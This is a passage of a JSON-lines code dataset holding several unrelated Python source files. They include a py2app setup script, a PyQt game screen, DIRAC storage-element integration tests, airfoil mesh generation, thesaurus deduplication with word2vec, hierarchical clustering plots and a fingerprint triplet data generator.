[]\nVERSION = OMB.version\nCOPYRIGHT = \"Copyright 2001724000. Released under the terms of the Artistic Licence/GPL.\"\nPLIST = {'CFBundleGetInfoString':'OSC-MIDI Bridge',\n 'CFBundleVersion':'1.0',\n 'NSHumanReadableCopyright':COPYRIGHT,\n 'CFBundleDisplayName':'OSC-MIDI Bridge',\n }\n\n# Resources\nresourcesAbsPath = path.abspath(\"resources\")\nconfAbsPath = path.abspath(\"conf\")\nRESOURCES = [resourcesAbsPath, confAbsPath]\n\nICONFILE = path.abspath('resources/app.icns')\n\nOPTIONS = {'argv_emulation': False,\n 'plist':PLIST,\n 'resources':RESOURCES,\n 'iconfile':ICONFILE,\n 'includes':['sip']}\n\nsetup(\n version=VERSION,\n app=APP,\n data_files=DATA_FILES,\n licence=\"Artistic Licence/GPL\",\n url=\"http://osc-midi-bridge.googlecode.com\",\n author=\"2001724000\",\n author_email=\"mc07jap@leeds.ac.uk\",\n options={'py2app': OPTIONS},\n setup_requires=['py2app'],\n)\n","sub_path":"OSC MIDI Bridge/src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"328908907","text":"from GameStates import State\nfrom ItemFader import ItemFader\nfrom PyQt4.QtCore import Qt\nfrom PyQt4.QtGui import (QGraphicsRectItem, QPixmap, QGraphicsPixmapItem,\n QGraphicsTextItem, QGraphicsSimpleTextItem)\n\nclass FailState(State):\n def __init__(self, machine):\n super(FailState, self).__init__(machine)\n self.__score = 0\n self.is_running = False\n self.layer = layer = QGraphicsRectItem()\n layer.setVisible(False)\n layer.setOpacity(0)\n self.fader = ItemFader(layer)\n self.scene.add_item(layer)\n\n if False:\n pixmap = QPixmap(\"rsc/fail.png\")\n self.splash = g = QGraphicsPixmapItem()\n g.setPixmap(pixmap)\n self.__relpos(g)\n g.setParentItem(layer)\n\n self.title = g = QGraphicsSimpleTextItem()\n g.setText(\"Naub 
Overflow\")\n font = g.font()\n font.setPixelSize(30)\n font.setBold(True)\n g.setFont(font)\n r = g.boundingRect()\n w, h = r.width(), r.height()\n self.__relpos(g, y = -1.33)\n g.setParentItem(layer)\n\n self.name_input = g = QGraphicsTextItem()\n font = g.font()\n font.setPixelSize(20)\n g.setFont(font)\n g.setPlainText('Anony Mous')\n self.__relpos(g)\n g.setTextInteractionFlags(Qt.TextEditorInteraction)\n g.setParentItem(layer)\n\n def callback(e):\n key, text = e.key(), e.text()\n if str(text) in [\"\\r\", \"\\n\"]:\n self.machine.highscore()\n return\n g = self.name_input\n type(g).keyPressEvent(g, e)\n self.__relpos(g)\n \n g.keyPressEvent = callback\n\n def __relpos(self, g, x = -0.5, y = -0.5):\n r = g.boundingRect()\n w, h = r.width(), r.height()\n g.setPos(x * w, y * h)\n\n def enter(self):\n self.__score = self.naubino.score\n\n self.is_running = True\n \n g = self.name_input\n g.setPlainText('Anony Mous')\n self.__relpos(g)\n g.setFocus()\n \n self.fader.fade_in()\n naubino = self.scene.naubino\n naubs = naubino.naubs[:]\n for naub in naubs: naub.remove()\n\n def leave(self):\n if not self.is_running: return\n self.is_running = False\n name, score = self.name_input.toPlainText(), self.__score\n self.scene.highscore.submit_score(name, score)\n self.fader.fade_out()\n","sub_path":"src/FailState.py","file_name":"FailState.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"42570538","text":"\"\"\"\nTest upload/replication/download/removal for different StorageElements\n\"\"\"\nfrom __future__ import print_function\nimport filecmp\nimport os\nimport random\nimport shutil\nimport string\nimport subprocess\nimport sys\nimport tempfile\n\nfrom itertools import permutations\n\nimport pytest\n\nfrom DIRAC.Core.Security import ProxyInfo\nfrom DIRAC.Core.Base import Script\n\n# mark all tests in this file as integration tests\npytestmark = pytest.mark.integration # pylint: disable=invalid-name\n\n__RCSID__ = '$Id$'\n\nSTORAGEELEMENTS = ['CERN-DIP-4', 'CERN-SRM', 'CERN-DST-EOS']\nSE_PAIRS = list(permutations(STORAGEELEMENTS, 2))\n\nSE_ARGUMENTS = [(SE, ) for SE in STORAGEELEMENTS]\n\nSE_PAIR_ARGUMENTS = [pytest.param(site1, site2, marks=pytest.mark.timeout(100)) for site1, site2 in SE_PAIRS]\n\n\ndef randomFolder():\n \"\"\" create a random string of 8 characters \"\"\"\n return ''.join(random.SystemRandom().choice(string.ascii_lowercase) for _ in xrange(8))\n\n\ndef assertOperationSuccessful(result, message):\n \"\"\"Check if the DMS operation completed successfully.\n\n Success is indicated by the first line consisting of \"'Failed: {}'\"\n and the second line consisting of \"'Successful': {\" followed by the filename (not checked)\n \"\"\"\n assert result.count(\"'Failed': {}\") == 1 & result.count(\"'Successful': {'\") == 1, message\n\n\ndef removeFileAllowFailing(options):\n \"\"\"Remove the random file from the storage elements, if it exists.\"\"\"\n try:\n subprocess.check_output(['dirac-dms-remove-files', options.lfntestfile] + options.options)\n except subprocess.CalledProcessError:\n sys.exc_clear()\n\n\ndef removeFile(options):\n \"\"\"Remove the random file from the storage elements.\"\"\"\n result = subprocess.check_output(['dirac-dms-remove-files', options.lfntestfile] + options.options)\n assert result.count('Successfully removed 1 files') == 1, 'Removal of random file failed: ' + result\n\n\ndef uploadFile(site, options):\n \"\"\"Upload the local random file to the storage 
elements.\"\"\"\n try:\n result = subprocess.check_output(['dirac-dms-add-file', '-ddd',\n options.lfntestfile,\n options.localtestfile, site] + options.options)\n assert result.count('Successfully uploaded ') == 1, 'Upload of random file failed'\n except subprocess.CalledProcessError as err:\n assert False, err.output\n\n\ndef replicateTo(site, options):\n \"\"\"Replicate the random file to another storage element and check if it worked.\"\"\"\n try:\n cmd = ['dirac-dms-replicate-lfn', options.lfntestfile, site, '-ddd'] + options.options\n result = subprocess.check_output(cmd)\n assertOperationSuccessful(result, 'Failed replicating file')\n except subprocess.CalledProcessError as err:\n print('Command failed:' % cmd)\n print(err.output)\n assert False\n\n\ndef removeDownloadedFile(options):\n \"\"\"Remove the lfn test file if it exists locally.\"\"\"\n if os.path.exists(options.lfntestfilename):\n try:\n os.unlink(options.lfntestfilename)\n except EnvironmentError as err:\n print('failed to remove lfn', repr(err))\n\n\n@pytest.fixture(scope='module')\ndef proxySetup():\n \"\"\"Ensure dirac commands can be run.\n\n Need to execute parseCommandLIne so we can get the proxy information.\n This fixture is run once for the module.\n \"\"\"\n Script.parseCommandLine()\n\n\n@pytest.fixture\ndef opt(proxySetup):\n \"\"\"Options to be used in the tests.\"\"\"\n user = ProxyInfo.getProxyInfo()['Value']['username']\n\n class Options(object):\n localtestfile = 'testfile'\n lfntestfilename = 'testfile_uploaded.txt'\n lfntestfilepath = '/ilc/user/'\n lfntestfilepath += '%s/%s/setests/%s/' % (user[0], user, randomFolder())\n lfntestfile = os.path.join(lfntestfilepath, lfntestfilename)\n options = ['-o', '/Resources/FileCatalogs/LcgFileCatalog/Status=InActive',\n '-o', '/DIRAC/Setup=ILC-Test',\n ]\n print('Using lfn %s' % lfntestfilepath)\n return Options()\n\n\n@pytest.fixture\ndef randomFile(opt):\n \"\"\"Set up the objects.\"\"\"\n # Check if file exists already\n try:\n subprocess.check_output(['dirac-dms-remove-files', opt.lfntestfile] + opt.options)\n print('WARN Warning: file already existed on SE:', opt.lfntestfile)\n except subprocess.CalledProcessError:\n sys.exc_clear()\n\n # Make temporary dir to run test in\n opt.curdir = os.getcwd()\n opt.tmpdir = tempfile.mkdtemp('', dir='./')\n os.chdir(opt.tmpdir)\n\n # Create testfile with random bits\n with open(opt.localtestfile, 'wb') as fout:\n fout.write(' My random testfile ')\n fout.write(os.urandom(1024 * 1024))\n yield\n # tear down\n removeFileAllowFailing(opt)\n os.chdir(opt.curdir)\n shutil.rmtree(opt.tmpdir)\n\n\n@pytest.mark.parametrize(('site',), SE_ARGUMENTS)\ndef test_storing(randomFile, opt, site):\n \"\"\"Upload the file to a given SE, then retrieve it and check for equality.\"\"\"\n uploadFile(site, opt)\n # get file from SE, check for equivalence\n result = subprocess.check_output(['dirac-dms-get-file', '-ddd', opt.lfntestfile] + opt.options)\n assertOperationSuccessful(result, 'Retrieval of random file from storage element to local failed: ' + result)\n assert filecmp.cmp(opt.localtestfile, opt.lfntestfilename), 'Stored wrong file'\n removeFile(opt)\n\n\n@pytest.mark.parametrize(('site1', 'site2'), SE_PAIR_ARGUMENTS)\ndef test_replication(randomFile, opt, site1, site2):\n \"\"\"Replicate file to other SE, check if it is replicated there.\"\"\"\n uploadFile(site1, opt)\n # Replicate file to SE2, remove replica from SE1, get file, rm from all\n replicateTo(site2, opt)\n\n result = subprocess.check_output(['dirac-dms-remove-replicas', 
opt.lfntestfile, site1] + opt.options)\n assert result.count('Successfully removed') == 1, 'Failed removing replica of random file: ' + result\n\n result = subprocess.check_output(['dirac-dms-get-file', opt.lfntestfile] + opt.options)\n assertOperationSuccessful(result, 'Retrieval of random file from storage element to local failed: ' + result)\n\n assert filecmp.cmp(opt.localtestfile, opt.lfntestfilename), 'Received wrong file'\n removeDownloadedFile(opt)\n\n\n@pytest.mark.parametrize(('site1', 'site2'), SE_PAIR_ARGUMENTS)\ndef test_removal(randomFile, opt, site1, site2):\n \"\"\"Upload file to SE1, replicate to SE2, remove file and ensure retrieve fails.\"\"\"\n uploadFile(site1, opt)\n replicateTo(site2, opt)\n\n result = subprocess.check_output(['dirac-dms-remove-files', opt.lfntestfile] + opt.options)\n assert result.count('Successfully removed 1 files') == 1, 'Removal of random file failed: ' + result\n\n try:\n result = subprocess.check_output(['dirac-dms-get-file', opt.lfntestfile] + opt.options)\n assert False, 'Get file should not succeed'\n except subprocess.CalledProcessError as err:\n assert err.output.count('ERROR') >= 1, 'File not removed from SE even though it should be: ' + err.output\n","sub_path":"Workflow/Modules/Test/Test_SEs.py","file_name":"Test_SEs.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225785245","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport math\r\nimport core.PlotMethod as PlotMethod\r\n\r\nN=60\r\nM=60\r\n\r\nx=np.zeros(shape=(M,N))\r\ny=np.zeros(shape=(M,N)) \r\n\r\n#input dara airfoil\r\ndata = pd.read_excel('Airfoil2412 baru.xlsx')\r\nairfoil = data.to_numpy()\r\n\r\nlength=np.int(len(airfoil)) #panjang BC dan FG\r\nlength2=np.int((N-length)/2) #panjang AB CD EF dan HG\r\n\r\ntheta=np.linspace(3/2*np.pi,1/2*np.pi,length) #definisi sudut\r\n\r\nfor i in range(length): #mendefinisikan titik dari BC sebagai titik airfoil\r\n x[0,length2+i]=airfoil[i,0]\r\n y[0,length2+i]=airfoil[i,1]\r\n\r\nfor i in range(length): #mendefinisikan titik FG\r\n x[M-1,length2+i]=10*math.cos(theta[i])\r\n y[M-1,length2+i]=10*math.sin(theta[i])\r\n\r\nfor i in range(length2):\r\n x[0,i]=10*(1-i/length2) #titik AB\r\n y[0,i]=0\r\n x[0,length+length2+i]=10*(i+1)/length2 #titik CD\r\n y[0,length+length2+i]=0\r\n \r\n x[M-1,i]=10*(1-i/length2) #titik EF\r\n y[M-1,i]=-10 \r\n x[M-1,length+length2+i]=10*(i+1)/length2 #titik GH\r\n y[M-1,length+length2+i]=10 \r\n \r\n\r\npsi=np.zeros((M-1,N-1))\r\neta=np.zeros((M-1,N-1))\r\n\r\n\r\nfor i in range(M-1):\r\n psi[i,0]=(math.exp(i/M)-1)/(math.exp(1)-1)\r\n#for j in range(N-1):\r\n #eta[0,j]=(math.exp(j/N)-1)/(math.exp(1)-1)\r\n\r\nfor j in range(N-1):\r\n x[j,0]=10 #titik AH\r\n y[j,0]=-10*psi[j,0]\r\n x[j,N-1]=10 #titik DE\r\n y[j,N-1]=10*psi[j,0]\r\n\r\n\r\n#nilai k pada boundary\r\nkB=np.zeros((M-1,1))\r\nkT=np.zeros((M-1,1))\r\nkL=np.zeros((1,N-1))\r\nkR=np.zeros((1,N-1))\r\n\r\nkBtotal=0\r\nkTtotal=0\r\nkLtotal=0\r\nkRtotal=0\r\n\r\nfor i in range(1,M-1): #kBtotal\r\n R = math.sqrt(((x[i,0]-x[i-1,0])**2)+((y[i,0]-y[i-1,0])**2))\r\n kBtotal=kBtotal+R\r\nfor i in range(1,M-1):\r\n R = math.sqrt(((x[i,0]-x[i-1,0])**2)+((y[i,0]-y[i-1,0])**2))\r\n kB[i,0] = kB[i-1,0]+R/kBtotal\r\n\r\nfor i in range(1,M-1): #kTtotal\r\n R = math.sqrt(((x[i,M-1]-x[i-1,M-1])**2+(y[i,M-1]-y[i-1,M-1])**2))\r\n kTtotal=kTtotal+R\r\nfor i in range(1,M-1): \r\n R = 
math.sqrt(((x[i,M-1]-x[i-1,M-1])**2+(y[i,M-1]-y[i-1,M-1])**2))\r\n    kT[i,0]=kT[i-1,0]+R/kTtotal\r\n    \r\nfor j in range(1,N-1): #kLtotal\r\n    R = math.sqrt(((x[0,j]-x[0,j-1])**2)+((y[0,j]-y[0,j-1])**2))\r\n    kLtotal=kLtotal+R\r\nfor j in range(1,N-1): \r\n    R = math.sqrt(((x[0,j]-x[0,j-1])**2)+((y[0,j]-y[0,j-1])**2))\r\n    kL[0,j] = kL[0,j-1]+R/kLtotal \r\n\r\nfor j in range(1,N-1): #kRtotal\r\n    R = math.sqrt(((x[N-1,j]-x[N-1,j-1])**2)+((y[N-1,j]-y[N-1,j-1])**2))\r\n    kRtotal=kRtotal+R\r\nfor j in range(1,N-1): \r\n    R = math.sqrt(((x[N-1,j]-x[N-1,j-1])**2)+((y[N-1,j]-y[N-1,j-1])**2))\r\n    kR[0,j] = kR[0,j-1]+R/kRtotal \r\n\r\n#nilai pada domain\r\nk1=np.zeros((M-1,N-1))\r\nk2=np.zeros((M-1,N-1))\r\n\r\nfor i in range(M-1):\r\n    for j in range(N-1):\r\n        part1=(1-kL[0,j])*kB[i,0]+kL[0,j]*kT[i,0]\r\n        part2=1-((kT[i,0]-kB[i,0])*(kR[0,j]-kL[0,j]))\r\n        k1[i,j]=part1/part2\r\n        \r\n        part1=(1-kB[i,0])*kL[0,j]+kB[i,0]*kR[0,j]\r\n        part2=1-((kR[0,j]-kL[0,j])*(kT[i,0]-kB[i,0]))\r\n        k2[i,j]=part1/part2\r\n\r\n#TFI \r\nfor i in range(1,M-1):\r\n    for j in range(1,N-1):\r\n        U=(1-k1[i,j])*x[0,j]+k1[i,j]*x[M-1,j]\r\n        V=(1-k2[i,j])*x[i,0]+k2[i,j]*x[i,N-1]\r\n        UV=(1-k1[i,j])*(1-k2[i,j])*x[0,0]+k1[i,j]*(1-k2[i,j])*x[M-1,0]+(1-k1[i,j])*k2[i,j]*x[0,N-1]+k1[i,j]*k2[i,j]*(x[M-1,N-1])\r\n        x[i,j]=U+V-UV\r\n        U=(1-k1[i,j])*y[0,j]+k1[i,j]*y[M-1,j]\r\n        V=(1-k2[i,j])*y[i,0]+k2[i,j]*y[i,N-1]\r\n        UV=(1-k1[i,j])*(1-k2[i,j])*y[0,0]+k1[i,j]*(1-k2[i,j])*y[M-1,0]+(1-k1[i,j])*k2[i,j]*y[0,N-1]+k1[i,j]*k2[i,j]*(y[M-1,N-1])\r\n        y[i,j]=U+V-UV\r\n\"\"\"\r\n#smoothing grid\r\nalpha=np.zeros((M,N))\r\nbeta=np.zeros((M,N))\r\ngamma=np.zeros((M,N))\r\nRx=np.zeros((M,N))\r\nRy=np.zeros((M,N))\r\nw=1.5\r\n#errorx=0\r\n#errory=0\r\nlastRvalue=1\r\niteration=0\r\nerror=1\r\nresidual=[]\r\n\r\n\r\nwhile (error>0.001):\r\n    for i in range(1,M-1):\r\n        for j in range(1,N-1):\r\n            alpha[i,j]=((x[i,j+1]-x[i,j-1])**2+(y[i,j+1]-y[i,j-1])**2)/4\r\n            beta[i,j]=(((x[i+1,j]-x[i-1,j])*(x[i,j+1]-x[i,j-1]))+((y[i+1,j]-y[i-1,j])*(y[i,j+1]-y[i,j-1])))/4\r\n            gamma[i,j]=((x[i+1,j]-x[i-1,j])**2+(y[i+1,j]-y[i-1,j])**2)/4\r\n\r\n            A=alpha[i,j]*(x[i+1,j]-2*x[i,j]+x[i-1,j])\r\n            B=(2*beta[i,j]*(x[i+1,j+1]-x[i-1,j+1]-x[i+1,j-1]+x[i-1,j-1]))/4\r\n            C=gamma[i,j]*(x[i,j+1]-(2*x[i,j])+x[i,j-1])\r\n            \r\n            Rx[i,j]=A-B+C\r\n            Ry[i,j]=A-B+C\r\n            \r\n            #update point\r\n            x[i,j]=x[i,j]+(w*(Rx[i,j]/(2*(alpha[i,j]+gamma[i,j]))))\r\n            y[i,j]=y[i,j]+(w*(Ry[i,j]/(2*(alpha[i,j]+gamma[i,j]))))\r\n    \r\n    iteration=iteration+1\r\n    \r\n    currentRvalue=np.sqrt(np.sum(Rx)**2 + np.sum(Ry)**2)\r\n    error=abs(lastRvalue-currentRvalue)\r\n    \r\n    lastRvalue=currentRvalue\r\n\"\"\"\r\nplt.scatter(x,y,s=2)\r\nPlotMethod.plotGrid(x, y)\r\n","sub_path":"tes.py","file_name":"tes.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179655603","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*- \nfrom itertools import combinations\nfrom collections import defaultdict\nimport logging,scipy,gensim.models\nimport calcul_similar,re, copy\nfrom pprint import pprint\n\n\ndef mk_dico_doublons_n4():\n\ttmp = \"\" #stock d'expressions de niveau 4\n\tdico_doublons = {} # { expression: [line_number1, line_number2] }\n\tth_lines=[]\n\twith open('../Resultats/thesaurus-corpus.txt', 'r') as f:\n\t\tfor linum, line in enumerate(f.readlines()):\n\t\t\tline = line.rstrip('\\n')\n\t\t\tth_lines.append(line)\n\t\t\t#print(linum, line)\n\t\t\texpression = line.strip()\n\t\t\tif line.count('\\t') == 4:\n\t\t\t\ttmp += str(linum)+' 
'+expression+','\n\t\t\t\t#tmp += expression+','\n\t\t\t\tif expression not in dico_doublons:\n\t\t\t\t\tdico_doublons.setdefault(expression,[linum])\n\t\t\t\telse:\n\t\t\t\t\tdico_doublons[expression].append(linum)\n\t\t\telse:\n\t\t\t\ttmp += '\\n'\n\t\tdi = copy.deepcopy(dico_doublons)\n\t\tfor key in di:\n\t\t\tif len(di[key]) < 2:\n\t\t\t\tdel dico_doublons[key]\n\treturn dico_doublons, tmp, th_lines\n\ndico_doublons, niveau4, th_lines = mk_dico_doublons_n4()\nniveau4 = niveau4.split('\\n')\nniveau4 = list(filter(None, niveau4))\n#print(niveau4)\n\nmodel = gensim.models.Word2Vec.load('../Resultats/wv.model')\nsimilar_neg = []\ncpt = 0\n\nsimilar = {} #{sac_expressions_n4: [lignes], moyenne}\nfor t in niveau4:\n\tsac_thesaurus = t.split(',')\n\tsac_thesaurus = list(filter(None, sac_thesaurus))\n\tif len(sac_thesaurus) > 1:\n\t\t#print('----------------------------------------------')\n\t\t#print(sac_thesaurus)\n\t\tsac_lignes = []\n\t\ttermes = []\n\t\tfor el in sac_thesaurus:\n\t\t\tlnum, term = el.split(' ', 1)\n\t\t\tsac_lignes.append(int(lnum))\n\t\t\ttermes.append(term)\n\t\t#print(sac_lignes)\n\t\t# print(termes)\n\t\tts = tuple(termes[:])\n\t\tsimilar.setdefault(ts, [])\n\t\tsimilar[ts].append(sac_lignes)\n\t\tcombine = list(combinations(termes,2))\n\t\tsimi= []\n\t\tfor t1,t2 in combine:\n\t\t\tcpt += 1\n\t\t\ts = calcul_similar.calcul_similarity(calcul_similar.avg_feature_vector(t1.split(),model, num_features=300),calcul_similar.avg_feature_vector(t2.split(),model, num_features=300))\n\t\t\t#print(t1,\"-\",t2,\" : \",s)\n\t\t\t#print(similar)\n\t\t\tif s != \"nan\" and s not in simi:\n\t\t\t\tsimi.append(s)\n\t\tavg = scipy.mean(simi)\n\t\tsimilar[ts].append(avg)\n#pprint(similar)\n\ndico_doublons_new = copy.deepcopy(dico_doublons)\nfor doublon in dico_doublons:\n\t#print('----------------------------------------------')\n\t#print(doublon, dico_doublons[doublon])\n\t#print(dico_doublons[doublon])\n\tlines=[]\n\tavg_simil=[]\n\tfor sacn4 in similar:\n\t\tif doublon in sacn4:\n\t\t\t#print(sacn4)\n\t\t\t#print(similar[sacn4])\n\t\t\tlines.append(similar[sacn4][0])\n\t\t\tavg_simil.append(similar[sacn4][1])\n\tif len(avg_simil) > 0:\n\t\t#print(\"max similarity doublon\")\n\t\t#print(lines)\n\t\t#print(avg_simil)\n\t\tidx_max_simil = avg_simil.index(max(avg_simil))\n\t\t#print(lines[idx_max_simil])\n\t\tmax_sim_doublon = set(dico_doublons[doublon]).intersection(set(lines[idx_max_simil])).pop()\n\t\tdico_doublons_new[doublon].remove(max_sim_doublon)\n\ndelete_lines=[]\nfor value in dico_doublons_new.values():\n\tdelete_lines.extend(value)\n#print(sorted(delete_lines))\n\nwith open('../Resultats/thesaurus-sans-doublons-n4.txt', 'w') as thes:\n\tfor numli, li in enumerate(th_lines):\n\t\tif numli not in delete_lines:\n\t\t\tthes.write(li+\"\\n\")\n\n\n\n\n\n\n\n","sub_path":"StatistiquesApprentissage/2017/Groupes/NidiaXianfan/Scripts/elimine-doublons.py","file_name":"elimine-doublons.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"374548151","text":"# This Python file uses the following encoding: utf-8\nimport pandas as pd \nimport numpy as np \nfrom collections import defaultdict\nimport re\nimport sys\nimport random\nimport matplotlib.pyplot as plt\nfrom random import randint\nimport matplotlib\nimport scipy\nfrom scipy.cluster.hierarchy import dendrogram, linkage \n#from ggplot import *\n# importing data\n#df = pd.read_csv('dating-full.csv', 
encoding='ISO-8859-1')\npd.set_option('mode.chained_assignment', None) #avoid the warning\ndf = pd.read_csv( sys.argv[1], encoding='ISO-8859-1', header=None)\nnp.random.seed(0)\n#####............(2).................########\nN = df.shape[0]\n\nX = df.values[0:,2:4]\nlabel = df.values[0:,1:2].ravel()\n\nclass_label = np.unique(label)\n\nexamples = []\nfor i in range (0,len(class_label)):\n\tX_new = []\n\tfor j in range (0,len(label)):\n\t\tif class_label[i] == label[j]:\n\t\t\tX_new.append(X[j]) \n\texamples.append(np.random.randint(0, len(X_new), size=10))\n\n\n#examples = np.random.randint(0, N, size=10)\n#print \"examples\",examples, len(examples), examples[0], len(examples[0]) #ok 10\nexamples_1d = (np.asarray(examples)).ravel()\n#print \"examples_1d\", examples_1d, len(examples_1d) #ok 100\nx_axis = []\ny_axis = []\n#class_label = []\n#print df2.loc[2,1]\nX_100 = []\nfor i in examples_1d:\n\t#class_label.append(df2.loc[i,1])\n\tx_axis.append(df.values[i,2])\n\ty_axis.append(df.values[i,3])\n\t#X_100.append(df.values[i,2:4])\n\t#print i\n#print \"x_axis\", len(x_axis), x_axis\n#print \"y_axis\", len(y_axis), y_axis\nX_100 = np.array(list(zip(x_axis, y_axis)), dtype=np.float32)\n#print \"X_100\", X_100, type(X_100), len(X_100)\n\n'''\nlabels = range(1, 11) \nplt.figure(figsize=(10, 7)) \nplt.subplots_adjust(bottom=0.1) \nplt.scatter(x_axis,y_axis, label='True Position')\n\nfor label, x, y in zip(labels,x_axis, y_axis): \n plt.annotate(\n label,\n xy=(x, y), xytext=(-3, 3),\n textcoords='offset points', ha='right', va='bottom')\nplt.show() \n\n'''\n\nlinked_sing = linkage(X_100, 'single')\n#print \"linked\", linked\n#labelList = range(1, 11)\n#print \"labelList\", labelList\nplt.figure(figsize=(10, 7)) \ndendrogram(linked_sing)\n\nlinked_com = linkage(X_100, 'complete')\n#print \"linked\", linked\n#labelList = range(1, 11)\n#print \"labelList\", labelList\nplt.figure(figsize=(10, 7)) \ndendrogram(linked_com)\n\nlinked_avg = linkage(X_100, 'average')\n#print \"linked\", linked\n#labelList = range(1, 11)\n#print \"labelList\", labelList\nplt.figure(figsize=(10, 7)) \ndendrogram(linked_avg)\nplt.show() \n'''\nlinked = linkage(X_100, 'single')\nP = dendrogram(linked)\npos = None\nplt.clf()\nicoord = scipy.array(P['icoord'])\n#print icoord\ndcoord = scipy.array(P['dcoord'])\ncolor_list = scipy.array(P['color_list'])\nxmin, xmax = icoord.min(), icoord.max()\nymin, ymax = dcoord.min(), dcoord.max()\nif pos:\n icoord = icoord[pos]\n dcoord = dcoord[pos]\n color_list = color_list[pos]\nfor xs, ys, color in zip(icoord, dcoord, color_list):\n plt.plot(xs, ys, color)\nplt.xlim(xmin-10, xmax + 0.1*abs(xmax))\nplt.ylim(ymin, ymax + 0.1*abs(ymax))\nplt.show()\n'''","sub_path":"HW5/hierarchical_3.1and3.2.py","file_name":"hierarchical_3.1and3.2.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"284681872","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 24 15:24:03 2018\n@author: Tuong Lam\n\"\"\"\n\nimport numpy as np\nimport math\nimport tensorflow as tf\n\nclass data_generator:\n \n def __init__(self, images, finger_id, person_id, translation, rotation, data_size, rotation_res):\n \"\"\" Initializes an instance of a data_generator class\n \n The data_generator contain attributes referring to the input data.\n The input data_size specifies the number of examples one wants to use\n from the original input data.\n Input:\n images - 4D numpy array of the format [nbr_of_images,height,width,1]\n 
finger_id - numpy array containing finger ids specified as integers (1,2,3,6,7,8)\n person_id - numpy array containing person ids specified as integers [0,inf)\n translation - 2D numpy array with rows corresponding to 2D translations\n rotation - numpy array containing rotation of images given in degrees\n data_size - amount of data one wants to use from original data\n rotation_res - number of rotated versions of original input data\n \"\"\"\n\n # Split fingerprint data into training, validation and testing sets\n percentages = [0.8,0.1]\n self.train_data, self.val_data, self.test_data = self.three_split_array(images[0:data_size,:,:,:], percentages)\n self.train_finger_id, self.val_finger_id, self.test_finger_id = self.three_split_array(finger_id[0:data_size], percentages)\n self.train_person_id, self.val_person_id, self.test_person_id= self.three_split_array(person_id[0:data_size], percentages)\n \n self.train_translation, self.val_translation, self.test_translation= self.three_split_array(translation[0:data_size], percentages)\n self.train_rotation, self.val_rotation, self.test_rotation= self.three_split_array(rotation[0:data_size], percentages)\n \n # Breakpoints for training data \n self.breakpoints_train = self.get_breakpoints(self.train_person_id, self.train_finger_id)\n \n # Breakpoints for validation data \n self.breakpoints_val= self.get_breakpoints(self.val_person_id, self.val_finger_id)\n \n # Breakpoints for test data \n self.breakpoints_test= self.get_breakpoints(self.test_person_id, self.test_finger_id)\n \n rot_diff = 5\n trans_diff = 30\n margin_trans = 192\n margin_rot = 20\n \n # Easy combinations of training data\n self.triplets_train, self.anchors_train = self.all_triplets_easy(self.breakpoints_train, self.train_rotation, self.train_translation, rot_diff, trans_diff, margin_rot, margin_trans)\n \n # Easy combinations of validation data\n self.triplets_val, self.anchors_val= self.all_triplets_easy(self.breakpoints_val, self.val_rotation, self.val_translation, rot_diff, trans_diff, margin_rot, margin_trans)\n \n # Easy combinations of test data\n self.triplets_test, self.anchors_test= self.all_triplets_easy(self.breakpoints_test, self.test_rotation, self.test_translation, rot_diff, trans_diff, margin_rot, margin_trans)\n \n self.rotation_res = rotation_res\n self.gen_rotations(self.train_data,self.val_data,self.test_data,self.rotation_res)\n \n # Save the original triplets\n self.triplets_train_original = self.triplets_train\n self.triplets_val_original = self.triplets_val\n self.triplets_test_original = self.triplets_test\n \n def add_new_data(self, images, finger_id, person_id, translation, rotation, data_size):\n percentages = [0.8,0.1]\n train_data, val_data, test_data = self.three_split_array(images[0:data_size,:,:,:], percentages)\n train_finger_id, val_finger_id, test_finger_id = self.three_split_array(finger_id[0:data_size], percentages)\n train_person_id, val_person_id, test_person_id= self.three_split_array(person_id[0:data_size], percentages)\n train_translation, val_translation, test_translation= self.three_split_array(translation[0:data_size], percentages)\n train_rotation, val_rotation, test_rotation= self.three_split_array(rotation[0:data_size], percentages)\n \n nbr_of_train_images = np.shape(self.train_data[0])[0]\n nbr_of_val_images = np.shape(self.val_data[0])[0]\n nbr_of_test_images = np.shape(self.test_data[0])[0]\n \n # Add new data to the current generator\n self.train_data[0] = np.append(self.train_data[0],train_data,axis=0)\n self.train_finger_id 
= np.append(self.train_finger_id,train_finger_id)\n self.train_person_id = np.append(self.train_person_id,train_person_id)\n self.train_rotation = np.append(self.train_rotation,train_rotation)\n self.train_translation = np.append(self.train_translation,train_translation,axis=0)\n self.val_data[0] = np.append(self.val_data[0],val_data,axis=0)\n self.val_finger_id = np.append(self.val_finger_id,val_finger_id)\n self.val_person_id = np.append(self.val_person_id,val_person_id)\n self.val_translation = np.append(self.val_translation,val_translation,axis=0)\n self.val_rotation = np.append(self.val_rotation,val_rotation)\n self.test_data[0] = np.append(self.test_data[0],test_data,axis=0)\n self.test_finger_id = np.append(self.test_finger_id,test_finger_id)\n self.test_person_id = np.append(self.test_person_id,test_person_id)\n self.test_rotation = np.append(self.test_rotation,test_rotation)\n self.test_translation = np.append(self.test_translation,test_translation,axis=0)\n \n self.gen_rotations(train_data,val_data,test_data,self.rotation_res) \n \n # Breakpoints for training data \n breakpoints_train = [e + nbr_of_train_images for e in self.get_breakpoints(train_person_id, train_finger_id)]\n \n # Breakpoints for validation data \n breakpoints_val= [e + nbr_of_val_images for e in self.get_breakpoints(val_person_id, val_finger_id)]\n \n # Breakpoints for test data \n breakpoints_test= [e + nbr_of_test_images for e in self.get_breakpoints(test_person_id, test_finger_id)]\n \n rot_diff = 5\n trans_diff = 30\n margin_trans = 192\n margin_rot = 